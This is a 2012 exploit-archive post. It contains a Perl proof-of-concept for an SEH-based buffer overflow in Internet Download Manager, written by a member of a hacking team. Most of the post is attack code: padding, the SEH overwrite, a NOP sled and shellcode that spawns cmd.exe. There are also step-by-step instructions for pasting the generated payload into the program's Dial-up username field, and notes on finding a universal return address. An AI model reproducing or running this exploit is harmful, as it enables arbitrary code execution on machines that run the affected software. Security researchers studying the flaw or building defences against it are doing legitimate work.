Home / exploits Internet Download Manager SEH Based Buffer Overflow
Posted on 15 September 2012
#!/usr/bin/perl # 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 # 0 _ __ __ __ 1 # 1 /' __ /'__` / \__ /'__` 0 # 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 # 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 # 0 / / / / \__/ \_ \_ / 1 # 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 # 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 # 1 \____/ >> Exploit database separated by exploit 0 # 0 /___/ type (local, remote, DoS, etc.) 1 # 1 1 # 0 [x] Official Website: http://www.1337day.com 0 # 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 # 0 0 # 1 ========================================== 1 # 0 I'm Dark-Puzzle From Inj3ct0r TEAM 0 # 0 1 # 1 dark-puzzle[at]live[at]fr 0 # 0 ========================================== 1 # 1 White Hat 1 # 0 Independant Pentester 0 # 1 exploit coder/bug researcher 0 # 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 # Title : Internet Download Manager All Versions-0day SEH Based Buffer Overflow+Universal. # Author : Dark-Puzzle (Souhail Hammou) # Type : Local # Risk : Critical # Vendor : Tonec Inc. # Versions : All versions of IDM are Vulnerable . # Tested On : Windows XP Service Pack 2 FR 32-bits . # Date : 14 September 2012 # Gr337ings to : Inj3ct0r Team - Packetstormsecurity.org - Securityfocus.com - Jigsaw - Dark-Soldier ... # Working On : WinXp SP2 - "Universal" . #Usage : Copy this script to idman2.pl #Execute : perl idman2.pl #Go to the file bof.txt , Select ALL , then Copy . # After copying the whole line Go To Downloads ---> Options ----> Dial up / VPN ----> paste the line into the username field and let the password field blank then click Enter . #French Version : Go to : Telechargement ---> Options ---> Internet ---> then Copy The Whole line from bof.txt and paste it into the username field and let the password field blank then click Enter . # BETTER COPY THE CONTENT OF THE FILE USING NOTEPAD++ # First Of all , This is a different exploit from (Internet Download Manager - Stack Based Overflow Vulnerability.) # Second , Script Kiddies will be happy with my latest Idman Vulnerabilities but don't bother, you may face some problems with the shellcode in this exploit So choose wisely the badchars . my $junk = "A" x 2301 ; my $nseh = "xebx32x90x90"; #look down for Universal address# 0x74ca4cdb OS address (WinXP SP2 Only with oledlg.dll) my $seh = "xdbx4cxcax74" ;# For the Universal address details look below . my $nops = "x90" x 44 ; my $shellcode = "x8BxECx33xFFx57". "xC6x45xFCx63xC6x45". "xFDx6DxC6x45xFEx64". "xC6x45xF8x01x8D". "x45xFCx50xB8xC7x93". "xBFx77xFFxD0"; # CMD.EXE Shellcode (After passing Automaticaly or with a debugger the exception to the handler we will be able to jmp to our shellcode after some nops .) my $junkk = "x90" x 9000; # Not Actually Junk ,This is what makes this exploit work =) So be careful . $payload= $junk.$nseh.$seh.$nops.$shellcode.$junkk; open(myfile,'>bofme.txt'); print myfile $payload; close(myfile); print "x44x69x73x63x6fx76x65x72x65x64x20x26x20x57x72x69x74x74x65x6ex20x42x79x20x44x61x72x6bx2dx50x75x7ax7ax6cx65 "; print "Creating Evil File Please Be Patient "; sleep (4); print " ".length($payload)." bytes has been written "; print "File bofme.txt Created Successfuly . "; print "Now Copy its content to Username field in IDMan DialUp options "; ##########Universal Address############## # I worked on finding a universal address and that's what I found . # First you may find some pop r/pop r2/ret / call dword ptr SS:[R+30] addresses in idman.exe Module . # but The problem here is that all the addr in this module look like this : 0x00ffffff # So it will terminate the string and the vulnerability will not be executed . # Ok, the second problem is in idmmkb.dll we found an address "rebase" . As I analysed I found that the rebase goes between "a" and "b" in the address base # And the Top always stays the same . It will give us in this case two Possibilities 50% of each address to be the correct one in every program execution . # So All to do here is to try these two addresses manually or using a program . # The First one : 0x017A1B13 # The Second one : 0x017B1B13 # All you have to do is replace one of these in the "pointer to the next SE Handler" . ######################################## #Datasec Team .
